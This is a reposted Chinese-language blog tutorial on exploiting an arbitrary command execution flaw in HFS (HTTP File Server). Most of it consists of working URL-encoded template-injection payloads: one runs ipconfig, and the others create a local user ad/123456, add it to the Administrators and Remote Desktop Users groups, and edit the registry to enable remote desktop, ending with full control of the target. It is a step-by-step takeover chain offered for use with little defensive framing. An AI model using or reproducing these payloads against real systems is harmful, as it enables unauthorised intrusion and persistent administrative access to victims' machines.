渗透hfs任意命令执行
一、环境
网上自行下载
二、步骤
当启动hfs后
在页面执行payload即可造成回显:
/?n=%0A&cmd=ipconfig&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}V{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
我们使用这个命令执行漏洞去添加一个用户
添加用户ad/123456:
?n=&cmd=net user ad 123456 /add&search=%xxx%url%:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}V{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
成功添加:
将用户添加到管理员组和远程桌面组
/?n=&cmd=net localgroup "administrators" ad /add&search=%xxx%url%:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}V{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
将用户添加到远程桌面组
/?n=&cmd=net localgroup "Remote Desktop Users" ad /add&search=%xxx%url%:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}V{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
打开对方远程桌面
/?n=&cmd=reg add %22HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server%22 /v fDenyTSConnections /t REG_DWORD /d 0 /f&search=%xxx%url%:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}V{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
尝试远控
输入我们刚才创建的ad和123456
成功控制
原文地址:https://blog.csdn.net/m0_68976043/article/details/140573882
免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!